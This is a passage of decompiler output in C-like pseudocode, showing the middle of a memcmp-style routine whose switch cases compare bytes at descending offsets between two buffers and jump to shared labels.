                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L157;
                                                                                                                						case 9:
                                                                                                                							L234:
                                                                                                                							__edx =  *(__eax - 9);
                                                                                                                							if( *(__eax - 9) ==  *(__ecx - 9)) {
                                                                                                                								__esi = 0;
                                                                                                                								L244:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L245;
                                                                                                                							}
                                                                                                                							__edx =  *(__ecx - 9) & 0x000000ff;
                                                                                                                							__esi =  *(__eax - 9) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L237:
                                                                                                                								__esi =  *(__eax - 8) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 8) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L239:
                                                                                                                									__esi =  *(__eax - 7) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 7) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L241:
                                                                                                                										__esi =  *(__eax - 6) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 6) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L244;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L241;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L239;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L237;
                                                                                                                						case 0xa:
                                                                                                                							L313:
                                                                                                                							__edx =  *(__eax - 0xa);
                                                                                                                							if( *(__eax - 0xa) ==  *(__ecx - 0xa)) {
                                                                                                                								__esi = 0;
                                                                                                                								L323:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L324;
                                                                                                                							}
                                                                                                                							__edx =  *(__ecx - 0xa) & 0x000000ff;
                                                                                                                							__esi =  *(__eax - 0xa) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L316:
                                                                                                                								__edx =  *(__ecx - 9) & 0x000000ff;
                                                                                                                								__esi =  *(__eax - 9) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L318:
                                                                                                                									__edx =  *(__ecx - 8) & 0x000000ff;
                                                                                                                									__esi =  *(__eax - 8) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L320:
                                                                                                                										__edx =  *(__ecx - 7) & 0x000000ff;
                                                                                                                										__esi =  *(__eax - 7) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L323;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L320;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L318;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L316;
                                                                                                                						case 0xb:
                                                                                                                							L394:
                                                                                                                							__edx =  *(__eax - 0xb);
                                                                                                                							if( *(__eax - 0xb) ==  *(__ecx - 0xb)) {
                                                                                                                								__esi = 0;
                                                                                                                								L404:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L405;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0xb) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L397:
                                                                                                                								__esi =  *(__eax - 0xa) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0xa) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L399:
                                                                                                                									__esi =  *(__eax - 9) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 9) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L401:
                                                                                                                										__esi =  *(__eax - 8) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 8) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L404;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L401;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L399;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L397;
                                                                                                                						case 0xc:
                                                                                                                							L143:
                                                                                                                							__edx =  *(__eax - 0xc);
                                                                                                                							if( *(__eax - 0xc) ==  *(__ecx - 0xc)) {
                                                                                                                								__esi = 0;
                                                                                                                								L153:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L154;
                                                                                                                							}
                                                                                                                							__edx =  *(__ecx - 0xc) & 0x000000ff;
                                                                                                                							__esi =  *(__eax - 0xc) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L146:
                                                                                                                								__esi =  *(__eax - 0xb) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0xb) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L148:
                                                                                                                									__esi =  *(__eax - 0xa) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0xa) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L150:
                                                                                                                										__esi =  *(__eax - 9) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 9) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L153;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L150;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L148;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L146;
                                                                                                                						case 0xd:
                                                                                                                							L223:
                                                                                                                							__edx =  *(__eax - 0xd);
                                                                                                                							if( *(__eax - 0xd) ==  *(__ecx - 0xd)) {
                                                                                                                								__esi = 0;
                                                                                                                								L233:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L234;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0xd) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L226:
                                                                                                                								__esi =  *(__eax - 0xc) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0xc) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L228:
                                                                                                                									__esi =  *(__eax - 0xb) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0xb) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L230:
                                                                                                                										__esi =  *(__eax - 0xa) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0xa) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L233;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L230;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L228;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L226;
                                                                                                                						case 0xe:
                                                                                                                							L302:
                                                                                                                							__edx =  *(__eax - 0xe);
                                                                                                                							if( *(__eax - 0xe) ==  *(__ecx - 0xe)) {
                                                                                                                								__esi = 0;
                                                                                                                								L312:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L313;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0xe) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L305:
                                                                                                                								__esi =  *(__eax - 0xd) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0xd) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L307:
                                                                                                                									__esi =  *(__eax - 0xc) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0xc) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L309:
                                                                                                                										__esi =  *(__eax - 0xb) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0xb) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L312;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L309;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L307;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L305;
                                                                                                                						case 0xf:
                                                                                                                							L383:
                                                                                                                							__edx =  *(__eax - 0xf);
                                                                                                                							if( *(__eax - 0xf) ==  *(__ecx - 0xf)) {
                                                                                                                								__esi = 0;
                                                                                                                								L393:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L394;
                                                                                                                							}
                                                                                                                							__edx =  *(__ecx - 0xf) & 0x000000ff;
                                                                                                                							__esi =  *(__eax - 0xf) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L386:
                                                                                                                								__esi =  *(__eax - 0xe) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0xe) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L388:
                                                                                                                									__esi =  *(__eax - 0xd) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0xd) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L390:
                                                                                                                										__esi =  *(__eax - 0xc) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0xc) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L393;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L390;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L388;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L386;
                                                                                                                						case 0x10:
                                                                                                                							L132:
                                                                                                                							__edx =  *(__eax - 0x10);
                                                                                                                							if( *(__eax - 0x10) ==  *(__ecx - 0x10)) {
                                                                                                                								__esi = 0;
                                                                                                                								L142:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L143;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x10) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L135:
                                                                                                                								__esi =  *(__eax - 0xf) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0xf) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L137:
                                                                                                                									__esi =  *(__eax - 0xe) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0xe) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L139:
                                                                                                                										__esi =  *(__eax - 0xd) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0xd) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L142;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L139;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L137;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L135;
                                                                                                                						case 0x11:
                                                                                                                							L212:
                                                                                                                							__edx =  *(__eax - 0x11);
                                                                                                                							if( *(__eax - 0x11) ==  *(__ecx - 0x11)) {
                                                                                                                								__esi = 0;
                                                                                                                								L222:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L223;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x11) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L215:
                                                                                                                								__esi =  *(__eax - 0x10) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x10) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L217:
                                                                                                                									__esi =  *(__eax - 0xf) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0xf) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L219:
                                                                                                                										__esi =  *(__eax - 0xe) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0xe) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L222;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L219;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L217;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L215;
                                                                                                                						case 0x12:
                                                                                                                							L291:
                                                                                                                							__edx =  *(__eax - 0x12);
                                                                                                                							if( *(__eax - 0x12) ==  *(__ecx - 0x12)) {
                                                                                                                								__esi = 0;
                                                                                                                								L301:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L302;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x12) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L294:
                                                                                                                								__esi =  *(__eax - 0x11) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x11) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L296:
                                                                                                                									__esi =  *(__eax - 0x10) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x10) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L298:
                                                                                                                										__esi =  *(__eax - 0xf) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0xf) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L301;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L298;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L296;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L294;
                                                                                                                						case 0x13:
                                                                                                                							L372:
                                                                                                                							__edx =  *(__eax - 0x13);
                                                                                                                							if( *(__eax - 0x13) ==  *(__ecx - 0x13)) {
                                                                                                                								__esi = 0;
                                                                                                                								L382:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L383;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x13) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L375:
                                                                                                                								__esi =  *(__eax - 0x12) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x12) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L377:
                                                                                                                									__esi =  *(__eax - 0x11) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x11) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L379:
                                                                                                                										__esi =  *(__eax - 0x10) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x10) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L382;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L379;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L377;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L375;
                                                                                                                						case 0x14:
                                                                                                                							L121:
                                                                                                                							__edx =  *(__eax - 0x14);
